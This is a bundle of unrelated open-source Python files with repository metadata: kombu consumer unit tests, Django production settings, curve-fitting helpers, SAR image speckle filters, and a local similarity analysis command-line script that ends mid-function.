queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True, no_ack=True)
assert consumer.no_ack
def test_add_queue_when_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=True)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
q.declare.assert_called_with()
def test_add_queue_when_not_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=False)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
assert not q.declare.call_count
def test_consume_without_queues_returns(self):
consumer = self.connection.Consumer()
consumer.queues[:] = []
assert consumer.consume() is None
def test_consuming_from(self):
consumer = self.connection.Consumer()
consumer.queues[:] = [Queue('a'), Queue('b'), Queue('d')]
consumer._active_tags = {'a': 1, 'b': 2}
assert not consumer.consuming_from(Queue('c'))
assert not consumer.consuming_from('c')
assert not consumer.consuming_from(Queue('d'))
assert not consumer.consuming_from('d')
assert consumer.consuming_from(Queue('a'))
assert consumer.consuming_from(Queue('b'))
assert consumer.consuming_from('b')
def test_receive_callback_without_m2p(self):
channel = self.connection.channel()
c = channel.Consumer()
m2p = getattr(channel, 'message_to_python')
channel.message_to_python = None
try:
message = Mock()
message.errors = []
message.decode.return_value = 'Hello'
recv = c.receive = Mock()
c._receive_callback(message)
recv.assert_called_with('Hello', message)
finally:
channel.message_to_python = m2p
def test_receive_callback__message_errors(self):
channel = self.connection.channel()
channel.message_to_python = None
c = channel.Consumer()
message = Mock()
try:
raise KeyError('foo')
except KeyError:
message.errors = [sys.exc_info()]
message._reraise_error.side_effect = KeyError()
with pytest.raises(KeyError):
c._receive_callback(message)
def test_set_callbacks(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
callbacks = [lambda x, y: x,
lambda x, y: x]
consumer = Consumer(channel, queue, auto_declare=True,
callbacks=callbacks)
assert consumer.callbacks == callbacks
def test_auto_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.consume() # twice is a noop
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'queue_bind',
'basic_consume'):
assert meth in channel
assert channel.called.count('basic_consume') == 1
assert consumer._active_tags
consumer.cancel_by_queue(queue.name)
consumer.cancel_by_queue(queue.name)
assert not consumer._active_tags
def test_consumer_tag_prefix(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, tag_prefix='consumer_')
consumer.consume()
assert consumer._active_tags[queue.name].startswith('consumer_')
def test_manual_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=False)
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'basic_consume'):
assert meth not in channel
consumer.declare()
for meth in ('exchange_declare',
'queue_declare',
'queue_bind'):
assert meth in channel
assert 'basic_consume' not in channel
consumer.consume()
assert 'basic_consume' in channel
def test_consume__cancel(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.cancel()
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test___enter____exit__(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
context = consumer.__enter__()
assert context is consumer
assert consumer._active_tags
res = consumer.__exit__(None, None, None)
assert not res
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test_flow(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.flow(False)
assert 'flow' in channel
def test_qos(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.qos(30, 10, False)
assert 'basic_qos' in channel
def test_purge(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4], auto_declare=True)
consumer.purge()
assert channel.called.count('queue_purge') == 4
def test_multiple_queues(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4])
consumer.consume()
assert channel.called.count('exchange_declare') == 4
assert channel.called.count('queue_declare') == 4
assert channel.called.count('queue_bind') == 4
assert channel.called.count('basic_consume') == 4
assert len(consumer._active_tags) == 4
consumer.cancel()
assert channel.called.count('basic_cancel') == 4
assert not len(consumer._active_tags)
def test_receive_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
received = []
def callback(message_data, message):
received.append(message_data)
message.ack()
message.payload # trigger cache
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_ack' in channel
assert 'message_to_python' in channel
assert received[0] == {'foo': 'bar'}
def test_basic_ack_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.ack()
message.ack()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
def test_basic_reject(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
message.reject()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject__requeue(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_basic_reject__requeue_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
message.requeue()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_receive_without_callbacks_raises(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
with pytest.raises(NotImplementedError):
consumer.receive(1, 2)
def test_decode_error(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.channel.throw_decode_error = True
with pytest.raises(ValueError):
consumer._receive_callback({'foo': 'bar'})
def test_on_decode_error_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
thrown = []
def on_decode_error(msg, exc):
thrown.append((msg.body, exc))
consumer = Consumer(channel, [b1], on_decode_error=on_decode_error)
consumer.channel.throw_decode_error = True
consumer._receive_callback({'foo': 'bar'})
assert thrown
m, exc = thrown[0]
assert json.loads(m) == {'foo': 'bar'}
assert isinstance(exc, ValueError)
def test_recover(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.recover()
assert 'basic_recover' in channel
def test_revive(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
channel2 = self.connection.channel()
consumer.revive(channel2)
assert consumer.channel is channel2
assert consumer.queues[0].channel is channel2
assert consumer.queues[0].exchange.channel is channel2
def test_revive__with_prefetch_count(self):
channel = Mock(name='channel')
b1 = Queue('qname1', self.exchange, 'rkey')
Consumer(channel, [b1], prefetch_count=14)
channel.basic_qos.assert_called_with(0, 14, False)
def test__repr__(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
assert repr(Consumer(channel, [b1]))
def test_connection_property_handles_AttributeError(self):
p = self.connection.Consumer()
p.channel = object()
assert p.connection is None
|
celery/kombu
|
t/unit/test_messaging.py
|
test_messaging.py
|
py
| 24,481 |
python
|
en
|
code
| 2,643 |
github-code
|
6
|
6824520762
|
import os
from settings.common_settings import *
DEBUG = True
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.getenv('DB_NAME'),
'USER': os.getenv('DB_USER'),
'PASSWORD': os.getenv('DB_PASSWORD'),
'HOST': os.getenv('DB_HOST'),
'PORT': os.getenv('DB_PORT'),
'OPTIONS': {
'client_encoding': 'UTF8',
},
}
}
STATIC_URL = '/static/static/'
MEDIA_URL ='/static/media/'
STATIC_ROOT = '/vol/web/media'
MEDIA_ROOT = '/vol/web/static'
|
Baronchibuikem/DhangoGraphenePratice
|
server/settings/production_settings.py
|
production_settings.py
|
py
| 618 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34473798674
|
import numpy as np
from scipy.optimize import curve_fit
import sys
def fit_DD(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_DD(k, mu, lambda) with an given function
f(lambda, y0, ...) = PDD_0 + f(lambda)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f: fitting function f(lambda, *params)
fit: dictornary for results
Returns:
fit (dict)
fit['lambda'] (array): lambda[ilambda]
fit['PDD_params'] (array): best fitting *params
fit['PDD'] (array): best fitting PDD[ilamba]
"""
x = d['lambda'][:ilambda_max]
y = d['summary']['PDD'][ik, imu, :ilambda_max]/d['summary']['PDD0'][ik, imu]
def ff(x, *params):
return PDD0*f(x, *params)
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount - 1)
# fitting
try:
popt, pcov = curve_fit(f, x, y, p0=p0)
except RuntimeError:
return None
if fit is None:
fit = {}
fit['PDD_amp'] = d['summary']['PDD0'][ik, imu]
fit['PDD_params'] = popt
fit['lambda'] = x
fit['PDD'] = d['summary']['PDD0'][ik, imu]*f(x, *popt)
return fit
def fit_DU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_DU(k, mu, lambda) with an given function
f(lambda, ...) = A*lambda*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu: (int): mu index
f: (func): fitting function f(lambda, *params)
fit (dict): dictornary for results
"""
def ff(x, A, *params):
return A*x*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PDU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0,] + p0
p0[0] = y[10]/x[10]
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit DU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PDU_amp'] = popt[0]
fit['PDU_params'] = popt[1:]
fit['lambda'] = x
fit['PDU'] = ff(x, *popt)
return fit
def fit_UU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_UU(k, mu, lambda) with an given function
f(lambda, ...) = A*lambda**2*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f (func): fitting function f(lambda, *params)
fit (dict): dictionary for the result
"""
def ff(x, A, *params):
return A*x**2*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PUU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0.0,] + p0
p0[0] = y[10]/x[10]**2
assert(len(p0) == f.__code__.co_argcount)
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit UU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PUU_amp'] = popt[0]
fit['PUU_params'] = popt[1:]
fit['lambda'] = x
fit['PUU'] = ff(x, *popt)
return fit
def _nans(shape):
a = np.empty(shape)
a[:] = np.nan
return a
def fit_lambda(d, ik, imu, f, *,
kind=('DD', 'DU', 'UU'),
p0=None, ilambda_max=None):
"""
Fit lambda plot with a fitting function f for a pair of k, mu
P_DD(k, mu, lambda) = P_DD(k, mu, lambda=0)*f(lambda)
P_DU(k, mu, lambda) = P_DU_amp*lambda*f(lambda)
P_UU(k, mu, lambda) = P_UU_amp*lamba**2*f(lambda)
Args:
data (dict): lambda data loaded by load_lambda
ik (array-like): index of k
imu (array-like): index of mu
f (func): fitting function f(lambda, fitting parameters ...)
kind (list): fitting P_**, subset of ('DD', 'DU', 'UU')
p0 (list): initial parameter guess
ik, imu can be:
integer, 1D array, or 2D array.
Result:
fit (dict)
fit['PDD'] (np.array): fitted P_DD
fit['PDU'] (np.array): fitted P_DU
fit['PUU'] (np.array): fitted P_DU
fit['PDD_params']: best fitting parameters in f
fit['PDU_params']: best fitting parameters in f
fit['PUU_params']: best fitting parameters in f
fit['PDU_amp']: amplitude A in PDU = A*lambda*f(lambda)
fit['PUU_amp']: amplitude A in PDU = A*lambda**2*f(lambda)
None if fitting failed
"""
# single pair of (ik, imu)
if isinstance(ik, int) and isinstance(imu, int):
fit = {}
if np.isnan(d['summary']['PDD'][ik, imu, 0]):
return None
if 'DD' in kind:
fit_DD(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'DU' in kind:
fit_DU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'UU' in kind:
fit_UU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
return fit
# Convert ik, imu to np.array if they are array-like
if type(ik) != np.ndarray:
ik = np.array(ik, ndmin=1)
if len(ik.shape) == 1:
if type(imu) != np.ndarray:
imu = np.array(imu, ndmin=1)
if len(imu.shape) != 1:
raise TypeError('If ik is an 1D array, '
'imu must also be an 1D array: '
'imu.shape {}'.format(imu.shape))
nk = len(ik)
nmu = len(imu)
# Convert ik and imu to 2D arrays by repeating same row/column
ik = ik.reshape((nk, 1)).repeat(nmu, axis=1)
imu = imu.reshape((1, nmu)).repeat(nk, axis=0)
# 2D arrays of ik imu
if ik.shape != imu.shape:
raise TypeError('2D arrays ik imu must have the same shape: '
'{} != {}'.format(ik.shape, imu.shape))
nk = ik.shape[0]
nmu = ik.shape[1]
nparam = f.__code__.co_argcount
# number of free paramters for f + linear RSD amplitude
nlambda = len(d['lambda'][:ilambda_max])
# Arrays for fitting results
if 'DD' in kind:
PDD_params = _nans((nk, nmu, nparam))
PDD = _nans((nk, nmu, nlambda))
if 'DU' in kind:
PDU_params = _nans((nk, nmu, nparam))
PDU = _nans((nk, nmu, nlambda))
if 'UU' in kind:
PUU_params = _nans((nk, nmu, nparam))
PUU = _nans((nk, nmu, nlambda))
for i in range(nk):
for j in range(nmu):
ik_ij = ik[i, j]
imu_ij = imu[i, j]
if 'DD' in kind:
fit = fit_DD(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDD_params[i, j, 0] = fit['PDD_amp']
PDD_params[i, j, 1:] = fit['PDD_params']
PDD[i, j, :] = fit['PDD']
if 'DU' in kind:
fit = fit_DU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDU_params[i, j, 0] = fit['PDU_amp']
PDU_params[i, j, 1:] = fit['PDU_params']
PDU[i, j, :] = fit['PDU']
if 'UU' in kind:
fit = fit_UU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PUU_params[i, j, 0] = fit['PUU_amp']
PUU_params[i, j, 1:] = fit['PUU_params']
PUU[i, j, :] = fit['PUU']
fit = {}
fit['ik'] = ik
fit['imu'] = imu
fit['lambda'] = d['lambda'][:ilambda_max]
if 'DD' in kind:
fit['PDD'] = PDD
fit['PDD_params'] = PDD_params
if 'DU' in kind:
fit['PDU'] = PDU
fit['PDU_params'] = PDU_params
if 'UU' in kind:
fit['PUU'] = PUU
fit['PUU_params'] = PUU_params
return fit
|
junkoda/lambda
|
lib/lambdalib/lambda_fitting.py
|
lambda_fitting.py
|
py
| 8,421 |
python
|
en
|
code
| 0 |
github-code
|
6
|
659465820
|
import numpy as np
from tqdm import tqdm
from statistics import median
class Filter :
"""
To add :
- Filtre de Frost, Filtre de Gamma_MAP, Kuan
- Autoencoder filtering ?
"""
#class specialized for filtering SAR images formated as (height, len, (HH,HV,VV))
def __init__(self, img : np.ndarray , kernel_size : tuple[int,int]) -> None:
#kernel_size is the window on which we will apply our filter, example :
# if kernel_size == (3,3) then the mean will be computed on its direct neighbours in a 3x3 square.
self.original_img = img
self.kernel_size = kernel_size
self.height, self.length, self.dim = img.shape
self.k_height, self.k_length = kernel_size[0], kernel_size[1]
self.filtered_img = np.zeros_like(self.original_img)
def apply_average_filter(self):
img = self.original_img
filtered_img = np.zeros(img.shape, dtype = np.complex128)
height, length, dim = img.shape
k_height, k_length = self.kernel_size[0], self.kernel_size[1]
filtered_img = np.zeros_like(img)
for i in range(height) :
for j in range(length) :
top = max(0, i - k_height//2)
bottom = min(height, i + k_height//2 + 1)
left = max(0, j-k_length//2)
right = min(length, j + k_length//2 + 1)
filtered_img[i,j] = np.mean(img[top:bottom, left:right, :], axis = (0,1), dtype = complex)
self.filtered_img = filtered_img
def apply_median_filter(self) :
#this methods applies the median on each real part, imaginary part of each component HH, HV, VV.
for i in range(self.height) :
for k in range(self.length) :
top = max(0, i - self.k_height // 2 )
bottom = min(self.height, i + self.k_height // 2 + 1)
left = max(0, k - self.k_length // 2)
right = min(self.length, k + self.k_length // 2 + 1)
for d in range(self.dim) :
self.filtered_img[i, k, d] = median(np.real(self.original_img[top : bottom, left : right, d].reshape(-1))) + median(np.imag(self.original_img[top : bottom, left : right, d].reshape(-1))) * complex(real = 0, imag = 1)
def apply_lee_filter(self,sigma_v = 1.15):
"""
Applique le filtre de Lee à l'image SAR polarimetrique.
Le résultat apparaît dans la variable self.filtered_img
var_y est calculé localement pour chaque pixel selon l'article de Lee : Polarimetric SAR Speckle Filtering And Its Implication For Classification
Args:
sigma_v est un nombre arbitrairement choisi qui représente l'écart type du speckle, bruit que l'on cherche à filtrer
"""
img = self.original_img
size = self.k_height
img_mean = np.mean(img, axis = (0,1))
var_y = np.zeros_like(img)
var_x = np.zeros_like(img)
b = np.zeros_like(img)
for d in range(self.dim) :
for i in tqdm(range(self.height)) :
for j in range(self.length) :
top = max(0, i - self.k_height//2 )
bottom = min(self.height, i + self.k_height//2 + 1)
left = max(0, j - self.k_length//2)
right = min(self.length, j + self.k_length//2 + 1)
var_y[i,j,d] = np.mean(self.squared_norm(img[top:bottom, left: right,d]), axis = (0,1))-self.squared_norm(np.mean(img[top:bottom, left: right,d], axis = (0,1)))
var_x[i,j,d] = (var_y[i,j,d] - img_mean[d]*img_mean[d]*sigma_v*sigma_v)/(1+sigma_v*sigma_v)
if var_x[i,j,d] < 0 :
var_x[i,j,d] = 0
b[i,j,d] = var_x[i,j,d]/var_y[i,j,d]
self.filtered_img[i,j,d] = img_mean[d] + b[i,j,d] * (img[i,j,d] - img_mean[d])
return self.filtered_img
def squared_norm(self, c : complex) :
a = np.real(c)
b = np.imag(c)
return a*a + b*b
"""
Kuan and Frost filter are to be implemented
"""
|
ArnaudMi/Statistical-Learning-Methods-Contribution-for-the-description-of-SAR-targets
|
code/utils/filtre.py
|
filtre.py
|
py
| 4,147 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1140042349
|
import compcore
from joblib import Parallel, delayed
import multiprocessing
import numpy as np
import scipy as sp
import h5py
import sys, csv, re, os, time, argparse, string, tempfile
try:
import lsalib
except ImportError:
from lsa import lsalib
def main():
parser = argparse.ArgumentParser()
arg_precision_default=1000
arg_delayLimit_default=0
parser.add_argument("dataFile", metavar="dataFile", type=argparse.FileType('r'), \
help="the input data file,\n \
m by (r * s)tab delimited text; top left cell start with \
'#' to mark this is the header line; \n \
m is number of variables, r is number of replicates, \
s it number of time spots; \n \
first row: #header s1r1 s1r2 s2r1 s2r2; \
second row: x ?.?? ?.?? ?.?? ?.??; for a 1 by (2*2) data")
parser.add_argument("resultFile", metavar="resultFile", type=argparse.FileType('w'), \
help="the output result file")
parser.add_argument("-e", "--extraFile", dest="extraFile", default=None, \
type=argparse.FileType('r'),
help="specify an extra datafile, otherwise the first datafile will be used \n \
and only lower triangle entries of pairwise matrix will be computed")
parser.add_argument("-d", "--delayLimit", dest="delayLimit", default=arg_delayLimit_default, type=int,\
help="specify the maximum delay possible, default: {},\n \
must be an integer >=0 and <spotNum".format(arg_delayLimit_default))
parser.add_argument("-m", "--minOccur", dest="minOccur", default=50, type=int,
help="specify the minimum occurence percentile of all times, default: 50,\n")
parser.add_argument("-r", "--repNum", dest="repNum", default=1, type=int,
help="specify the number of replicates each time spot, default: 1,\n \
must be provided and valid. ")
parser.add_argument("-s", "--spotNum", dest="spotNum", default=4, type=int,
help="specify the number of time spots, default: 4,\n \
must be provided and valid. ")
parser.add_argument("-p", "--pvalueMethod", dest="pvalueMethod", default="perm", \
choices=["perm", "theo", "mix"],
help="specify the method for p-value estimation, \n \
default: pvalueMethod=perm, i.e. use permutation \n \
theo: theoretical approximaton; if used also set -a value. \n \
mix: use theoretical approximation for pre-screening \
if promising (<0.05) then use permutation. ")
parser.add_argument("-x", "--precision", dest="precision", default=arg_precision_default, type=int,\
help="permutation/precision, specify the permutation \n \
number or precision=1/permutation for p-value estimation. \n \
default is {}, must be an integer >0 ".format(arg_precision_default) )
parser.add_argument("-b", "--bootNum", dest="bootNum", default=0, type=int, \
choices=[0, 100, 200, 500, 1000, 2000],
help="specify the number of bootstraps for 95%% confidence \
interval estimation, default: 100,\n \
choices: 0, 100, 200, 500, 1000, 2000. \n \
Setting bootNum=0 avoids bootstrap. \n \
Bootstrap is not suitable for non-replicated data.")
parser.add_argument("-t", "--transFunc", dest="transFunc", default='simple', \
choices=['simple', 'SD', 'Med', 'MAD'],\
help="specify the method to summarize replicates data, default: simple, \n \
choices: simple, SD, Med, MAD \n \
NOTE: \n \
simple: simple averaging \n \
SD: standard deviation weighted averaging \n \
Med: simple Median \n \
MAD: median absolute deviation weighted median;" )
parser.add_argument("-f", "--fillMethod", dest="fillMethod", default='none', \
choices=['none', 'zero', 'linear', 'quadratic', 'cubic', 'slinear', 'nearest'], \
help="specify the method to fill missing, default: none, \n \
choices: none, zero, linear, quadratic, cubic, slinear, nearest \n \
operation AFTER normalization: \n \
none: fill up with zeros ; \n \
operation BEFORE normalization: \n \
zero: fill up with zero order splines; \n \
linear: fill up with linear splines; \n \
slinear: fill up with slinear; \n \
quadratic: fill up with quadratic spline; \n \
cubic: fill up with cubic spline; \n \
nearest: fill up with nearest neighbor")
parser.add_argument("-n", "--normMethod", dest="normMethod", default='robustZ', \
choices=['percentile', 'percentileZ', 'pnz', 'robustZ', 'rnz', 'none'], \
help="must specify the method to normalize data, default: robustZ, \n \
choices: percentile, none, pnz, percentileZ, robustZ or a float \n \
NOTE: \n \
percentile: percentile normalization, including zeros (only with perm)\n \
pnz: percentile normalization, excluding zeros (only with perm) \n \
percentileZ: percentile normalization + Z-normalization \n \
rnz: percentileZ normalization + excluding zeros + robust estimates (theo, mix, perm OK) \n \
robustZ: percentileZ normalization + robust estimates \n \
(with perm, mix and theo, and must use this for theo and mix, default) \n")
parser.add_argument("-q", "--qvalueMethod", dest="qvalueMethod", \
default='scipy', choices=['scipy'],
help="specify the qvalue calculation method, \n \
scipy: use scipy and storeyQvalue function, default \n \
")
#R: use R's qvalue package, require X connection")
parser.add_argument("-T", "--trendThresh", dest="trendThresh", default=None, \
type=float, \
help="if trend series based analysis is desired, use this option \n \
NOTE: when this is used, must also supply reasonble \n \
values for -p, -a, -n options")
parser.add_argument("-a", "--approxVar", dest="approxVar", default=1, type=float,\
help="if use -p theo and -T, must set this value appropriately, \n \
precalculated -a {1.25, 0.93, 0.56,0.13 } for i.i.d. standard normal null \n \
and -T {0, 0.5, 1, 2} respectively. For other distribution \n \
and -T values, see FAQ and Xia et al. 2013 in reference")
parser.add_argument("-v", "--progressive", dest="progressive", default=0, type=int,
help="specify the number of progressive output to save memory, default: 0,\n \
2G memory is required for 1M pairwise comparison. ")
arg_namespace = parser.parse_args()
fillMethod = vars(arg_namespace)['fillMethod']
normMethod = vars(arg_namespace)['normMethod']
qvalueMethod = vars(arg_namespace)['qvalueMethod']
pvalueMethod = vars(arg_namespace)['pvalueMethod']
precision = vars(arg_namespace)['precision']
transFunc = vars(arg_namespace)['transFunc']
bootNum = vars(arg_namespace)['bootNum']
approxVar = vars(arg_namespace)['approxVar']
trendThresh = vars(arg_namespace)['trendThresh']
progressive = vars(arg_namespace)['progressive']
delayLimit = vars(arg_namespace)['delayLimit']
minOccur = vars(arg_namespace)['minOccur']
dataFile = vars(arg_namespace)['dataFile'] #dataFile
extraFile = vars(arg_namespace)['extraFile'] #extraFile
resultFile = vars(arg_namespace)['resultFile'] #resultFile
repNum = vars(arg_namespace)['repNum']
spotNum = vars(arg_namespace)['spotNum']
try:
extraFile_name = extraFile.name
except AttributeError:
extraFile_name = ''
assert trendThresh==None or trendThresh>=0
if transFunc == 'SD':
fTransform = lsalib.sdAverage
elif transFunc == 'Med':
fTransform = lsalib.simpleMedian
elif transFunc == 'MAD':
fTransform = lsalib.madMedian
else:
fTransform = lsalib.simpleAverage
if repNum < 5 and transFunc == 'SD':
print("Not enough replicates for SD-weighted averaging, fall back to simpleAverage", file=sys.stderr)
transFunc = 'simple'
if repNum < 5 and transFunc == 'MAD':
print("Not enough replicates for Median Absolute Deviation, fall back to simpleMedian", file=sys.stderr)
transFunc = 'Med'
if normMethod == 'none':
zNormalize = lsalib.noneNormalize
elif normMethod == 'percentile':
zNormalize = lsalib.percentileNormalize
elif normMethod == 'percentileZ':
zNormalize = lsalib.percentileZNormalize
elif normMethod == 'robustZ':
zNormalize = lsalib.robustZNormalize
elif normMethod == 'pnz':
zNormalize = lsalib.noZeroNormalize
elif normMethod == 'rnz':
zNormalize = lsalib.robustNoZeroNormalize
else:
zNormalize = lsalib.percentileZNormalize
start_time = time.time()
col = spotNum
total_row_0 = 0
total_row_1 = 0
block = 2000
first_file = "first_file.txt"
second_file = "second_file.txt"
with open(first_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_0 += 1
with open(second_file, 'r') as textfile:
next(textfile)
for line in textfile:
total_row_1 += 1
i_m = 0
j_m = 0
start_0 = 1
end_0 = block
start_1 = 1
end_1 = block
if end_0 >= total_row_0:
end_0 = total_row_0
if end_1 >= total_row_1:
end_1 = total_row_1
manager = multiprocessing.Manager()
first_Data = manager.list()
second_Data = manager.list()
while i_m * block < total_row_0:
i_m += 1
skip_header = start_0
skip_footer = total_row_0 - end_0
firstData = np.genfromtxt(first_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(firstData.shape) == 1:
data = np.array([firstData])
firstFactorLabels = np.genfromtxt(first_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(firstFactorLabels)==str:
firstFactorLabels=[firstFactorLabels]
factorNum = firstData.shape[0]
tempData=np.zeros( ( factorNum, repNum, spotNum), dtype='float' )
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = firstData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
first_Data.append(tempData)
while j_m * block < total_row_1:
j_m += 1
skip_header = start_1
skip_footer = total_row_1 - end_1
secondData = np.genfromtxt(second_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(secondData.shape) == 1:
data = np.array([secondData])
secondFactorLabels=np.genfromtxt( second_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(secondFactorLabels)==str:
secondFactorLabels=[secondFactorLabels]
factorNum = secondData.shape[0]
tempData=np.zeros((factorNum,repNum,spotNum),dtype='float')
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = secondData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
second_Data.append(tempData)
merged_filename = 'merged_data_1.h5'
def myfun_pall(i):
data = compcore.LSA(total_row_0, total_row_1)
for j in range(0, len(second_Data)):
